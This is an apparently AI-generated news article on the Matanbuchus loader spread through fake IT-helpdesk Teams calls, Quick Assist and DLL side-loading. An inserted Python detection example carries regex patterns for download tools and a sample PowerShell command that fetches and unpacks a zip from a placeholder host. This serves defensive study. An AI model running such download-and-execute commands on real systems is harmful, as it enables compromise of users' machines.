Ethical Hacking News
Abuse of Microsoft Teams voice calls for malicious purposes has been linked to the latest version of the Matanbuchus malware loader, which includes enhanced evasion, obfuscation, and post-compromise capabilities.
Malicious actors are exploiting Microsoft Teams users through social engineering tactics to deliver malicious payloads. The Matanbuchus malware loader is being distributed through fake IT helpdesk calls placed over Microsoft Teams, with the aim of executing malicious payloads directly in memory. The latest version of Matanbuchus includes enhanced evasion, obfuscation, and post-compromise capabilities, making it a sophisticated threat. Microsoft Teams has been used in the past to breach organizations through social engineering, with attackers tricking users into downloading malicious files or exploiting bugs in the software.
Microsoft Teams, a popular communication and collaboration platform used by millions of individuals and organizations worldwide, has been found to be abused by malicious actors seeking to exploit its users through social engineering tactics. This recent development highlights the evolving nature of cyber threats, where adversaries are increasingly leveraging legitimate platforms to deliver malicious payloads.
According to recent reports, the Matanbuchus malware loader is being distributed through Microsoft Teams calls in which the attackers impersonate an IT helpdesk. The malware-as-a-service operation was first advertised on the dark web in early 2021 and was touted as a $2,500 Windows loader that could execute malicious payloads directly in memory to evade detection. The latest analyzed version of Matanbuchus includes enhanced evasion, obfuscation, and post-compromise capabilities, making it a sophisticated threat.
Microsoft Teams has been abused in the past to breach organizations using social engineering tactics. Attackers would typically infiltrate the chat and trick users into downloading a malicious file that then introduces the initial payload on the system. In 2023, a researcher created a specialized tool that exploited bugs in the software to allow malware delivery from external accounts. Last year, DarkGate malware operators abused Microsoft Teams to deliver their loader onto targets who used lax ‘External Access’ settings.
In the case of Matanbuchus, attackers initiate an external Microsoft Teams call posing as a legitimate IT helpdesk, convincing the target to launch Quick Assist, the remote support tool built into Windows. Quick Assist enables the attacker to gain interactive remote access and follow up by instructing the user to execute a PowerShell script. This script downloads and extracts a ZIP archive with three files that are used to launch the Matanbuchus loader on the device via DLL side-loading.
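The delivery chain described above maps onto a simple endpoint correlation. The following is an added example, not code from the article, BleepingComputer or Morphisec: it runs over constructed Sysmon-style process-create and image-load events (simplified field names, not Sysmon's schema) and flags a PowerShell download-and-extract launched under Quick Assist, then a DLL loaded from the same user-writable folder as its host binary. The Quick Assist path, file names and URL in the sample are placeholders.

```python
import ntpath
import re

USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(appdata|downloads|desktop)\\", re.I)
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", re.I)
EXTRACT = re.compile(r"expand-archive|\.zip\b", re.I)
SHELLS = ("powershell.exe", "pwsh.exe")

def base(path):
    return ntpath.basename(path).lower()

def ancestors(pid, procs, depth=6):
    """Yield parent, grandparent, ... of pid from the process-create events."""
    for _ in range(depth):
        proc = procs.get(pid)
        if proc is None or proc["ppid"] not in procs:
            return
        pid = proc["ppid"]
        yield procs[pid]

def detect(events):
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = []
    for e in events:
        if e["type"] == "process":
            # Rule 1: PowerShell under Quick Assist that downloads and unpacks an archive.
            if (base(e["image"]) in SHELLS and DOWNLOAD.search(e["cmdline"])
                    and EXTRACT.search(e["cmdline"])
                    and any(base(a["image"]) == "quickassist.exe" for a in ancestors(e["pid"], procs))):
                alerts.append(("remote-assist-powershell-download", e["pid"]))
        elif e["type"] == "imageload":
            # Rule 2: a binary in a user-writable folder loads an unsigned DLL from its own folder.
            host = procs.get(e["pid"])
            if (host and USER_WRITABLE.match(host["image"]) and not e["signed"]
                    and e["loaded"].lower().endswith(".dll")
                    and ntpath.dirname(e["loaded"]).lower() == ntpath.dirname(host["image"]).lower()):
                chained = any(base(a["image"]) in SHELLS + ("quickassist.exe",)
                              for a in ancestors(e["pid"], procs))
                alerts.append(("dll-sideload-user-dir" + ("-after-remote-assist" if chained else ""), e["pid"]))
    return alerts

SAMPLE = [  # constructed telemetry, not real logs; paths, names and URL are placeholders
    {"type": "process", "pid": 100, "ppid": 1, "cmdline": "QuickAssist.exe",
     "image": r"C:\Program Files\WindowsApps\QuickAssistPackage\QuickAssist.exe"},
    {"type": "process", "pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -c "Invoke-WebRequest https://example.invalid/u.zip -OutFile $env:APPDATA\\u.zip; '
                'Expand-Archive $env:APPDATA\\u.zip $env:APPDATA\\u"'},
    {"type": "process", "pid": 300, "ppid": 200, "cmdline": "host.exe", "image": r"C:\Users\alice\AppData\Roaming\u\host.exe"},
    {"type": "imageload", "pid": 300, "loaded": r"C:\Users\alice\AppData\Roaming\u\helper.dll", "signed": False},
    {"type": "process", "pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "imageload", "pid": 400, "loaded": r"C:\Windows\System32\shell32.dll", "signed": True},  # benign
]
```

Calling `detect(SAMPLE)` returns two alerts, for the PowerShell child (pid 200) and the side-loaded DLL (pid 300), and nothing for the benign explorer events; a real deployment would feed it the process-create and image-load events of an EDR or Sysmon pipeline.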
The attackers use this tactic to gain initial access, followed by further exploitation of the compromised system. The post-infection capabilities of the Matanbuchus malware include executing CMD or PowerShell commands and EXE, DLL, MSI, or shellcode payloads. It also collects details such as username, domain, OS build information, running EDR/AV processes, and the elevation status of its own process (admin or regular user).
Researchers at endpoint threat prevention company Morphisec found that the latest analyzed version of Matanbuchus includes enhanced evasion, obfuscation, and post-compromise capabilities. The malware checks the running processes to identify security tools on the system; Morphisec notes that the execution methods sent back from the C2 "are likely dependent on the current security stack of the victim."
In light of these findings, it is clear that Matanbuchus has developed into a sophisticated threat. It poses significant risks to individuals and organizations using Microsoft Teams for communication and collaboration.
Related Information:
https://www.ethicalhackingnews.com/articles/Abuse-of-Microsoft-Teams-Voice-Calls-for-Malicious-Purposes-The-Rise-of-Matanbuchus-ehn.shtml
https://www.bleepingcomputer.com/news/security/microsoft-teams-voice-calls-abused-to-push-matanbuchus-malware/
Published: Thu Jul 17 21:22:04 2025 by llama3.2 3B Q4_K_M